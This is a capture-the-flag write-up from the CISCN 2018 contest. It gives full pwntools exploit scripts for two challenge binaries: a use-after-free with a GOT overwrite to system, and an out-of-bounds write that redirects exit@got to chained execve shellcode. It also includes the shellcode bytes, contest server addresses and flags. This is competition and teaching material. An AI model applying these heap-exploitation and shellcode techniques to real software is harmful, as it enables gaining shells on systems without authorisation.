ciscn2018-pwn-wp
阿新 • • 發佈:2018-08-04
amd ast from pla lis for note 控制 ise
2018全國大學生網絡安全競賽 ,做了2 道題
task_supermarket
change_desc 裏面調用 realloc 會觸發 uaf
利用 uaf 修改 obj->desc_ptr 為 atoi@got , 泄露 libc, 使用 libc-database 找到相應的 libc
修改 atoi@got 為 system ,然後 輸入 sh , getshell
from pwn import * from time import sleep context(os=‘linux‘, log_level=‘info‘) context.terminal = [‘tmux‘, ‘splitw‘, ‘-h‘] # p = process("./task_supermarket") p = remote("117.78.43.197", 32138) def add(name, price, descrip_size, description): sleep(0.2) p.recvuntil("your choice>> ") p.sendline(‘1‘) p.recvuntil("name:") sleep(0.2) p.sendline(name) p.recvuntil("price:") sleep(0.2) p.sendline(str(price)) p.recvuntil("descrip_size:") sleep(0.2) p.sendline(str(descrip_size)) p.recvuntil("description:") sleep(0.1) p.send(description) def free(name): p.recvuntil("your choice>> ") p.sendline(‘2‘) p.recvuntil("name:") sleep(0.2) p.sendline(name) def list(): p.recvuntil("your choice>> ") p.sendline(‘3‘) def change_price(name, value): p.recvuntil("your choice>> ") p.sendline(‘4‘) p.recvuntil("name:") p.sendline(name) p.recvuntil("input the value you want to cut or rise in:") p.sendline(str(value)) def change_desc(name, descrip_size, description): p.recvuntil("your choice>> ") p.sendline(‘5‘) p.recvuntil("name:") sleep(0.2) p.sendline(name) p.recvuntil("descrip_size:") sleep(0.2) p.sendline(str(descrip_size)) p.recvuntil("description:") sleep(0.2) p.send(description) add(‘0‘, 80, 0x1c, ‘\n‘) add(‘1‘, 80, 0x1c, ‘\n‘) add(‘2‘, 80, 0x1c, ‘\n‘) add(‘3‘, 80, 0x1c, ‘\n‘) change_desc(‘1‘, 0x30, ‘\n‘) add(‘4‘, 80, 0x1c, ‘\n‘) add(‘5‘, 80, 0x80, ‘\n‘) read_got = 0x0804B010 atoi_got = 0x0804B048 payload = p32(0x34) payload += p32(0) * 3 payload += p32(0x50) payload += ‘\x90\n‘ change_desc(‘1‘, 0x1c, payload) payload = ‘\x00‘ * (0x20 - 8) payload += p32(0) payload += p32(0x21) payload += p32(0x35) payload += p32(0) * 3 payload += p32(0x50) payload += p32(0x90) payload += p32(atoi_got) change_desc(‘4‘, 0x90, payload + ‘\n‘) list() p.recvuntil("5: price.80, des.") libc = ELF("/home/haclh/workplace/libc-database/db/libc6-i386_2.23-0ubuntu9_amd64.so") leak = u32(p.recv(4)) libc.address = leak - libc.symbols[‘atoi‘] info("libc: " + hex(libc.address)) info("leak: " + hex(leak)) payload = p32(libc.symbols[‘system‘]) change_desc(‘5‘, 0x90, payload + ‘\n‘) # gdb.attach(p) # pause() p.recvuntil("your choice>> ") p.sendline("sh") p.interactive()
flag: ciscn{1beba07b6a3232220b92429c6a0ac1e4}
task_note_service2
add 的時候會越界。
程序沒開 nx, 利用越界改 exit@got 為 堆地址,然後布置 shellcode , 由於嚴格控制大小。使用 短跳轉 連接各條 shellcode 需要的語句。用到的 shellcode 為
xor esi, esi push rsi push rsi mov ebx, 0x6e69622f mov [rsp], ebx mov ebx, 0x68732f2f mov [rsp+4], ebx mov rdi, rsp push 0x3b pop rax xor rdx,rdx syscall
最終 exp
from pwn import * from time import sleep context(os=‘linux‘, log_level=‘debug‘) context.terminal = [‘tmux‘, ‘splitw‘, ‘-h‘] # p = process("./task_note_service2") p = remote("49.4.23.165", 32510) base = 0x555555554000 def add(idx, content): sleep(0.2) p.recvuntil("your choice>> ") p.sendline(‘1‘) p.recvuntil("index:") sleep(0.2) p.sendline(str(idx)) p.recvuntil("size:") sleep(0.2) p.sendline(str(len(content))) p.recvuntil("content:") sleep(0.2) p.send(content) def free(idx): p.recvuntil("your choice>> ") p.sendline(‘2‘) p.recvuntil("index:") sleep(0.2) p.sendline(str(idx)) gdb_command = ‘‘‘ x/20xg {} break *0x0000555555757030 c ‘‘‘.format(hex(base + 0x2020A0)) add(-7, ‘\x90\x31\xf6\x56\x56\xeb\x19\n‘) # exit ---> shellocde add(0, ‘\xbb\x2f\x62\x69\x6e\xeb\x19\n‘) # push add(1, ‘\x90\x90\x89\x1c\x24\xeb\x19\n‘) # push add(2, ‘\xbb\x2f\x2f\x73\x68\xeb\x19\n‘) # push add(3, ‘\x89\x5c\x24\x04\x90\xeb\x19\n‘) # push add(4, ‘\x48\x89\xe7\x6a\x3b\xeb\x19\n‘) # push add(5, ‘\x58\x48\x31\xd2\x0f\x05\n‘) # push # gdb.attach(p, gdb_command) # pause() p.recvuntil("your choice>>") p.sendline("5") p.interactive() ‘‘‘ xor esi, esi push rsi push rsi mov ebx, 0x6e69622f mov [rsp], ebx mov ebx, 0x68732f2f mov [rsp+4], ebx mov rdi, rsp push 0x3b pop rax xor rdx,rdx syscall ‘‘‘
flag: ciscn{133fb0f0ca3ddf24964975f1ab94d082}
ciscn2018-pwn-wp